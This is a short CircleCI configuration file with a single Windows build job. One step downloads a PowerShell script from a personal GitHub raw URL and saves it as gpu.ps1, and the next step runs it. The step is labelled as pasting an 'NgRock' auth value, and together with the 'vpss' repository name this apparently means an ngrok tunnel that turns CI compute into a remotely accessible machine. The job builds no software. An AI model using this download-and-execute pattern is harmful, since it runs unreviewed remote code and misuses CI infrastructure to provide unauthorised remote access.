version: 2.1

orbs:
    win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      size: "medium"



    steps:

        - run:
            name: Paste NgRock Auth Value In Link
            command:
              Invoke-WebRequest https://raw.githubusercontent.com/yakhawkin/vpss/main/sh -OutFile gpu.ps1

        - run: ./gpu.ps1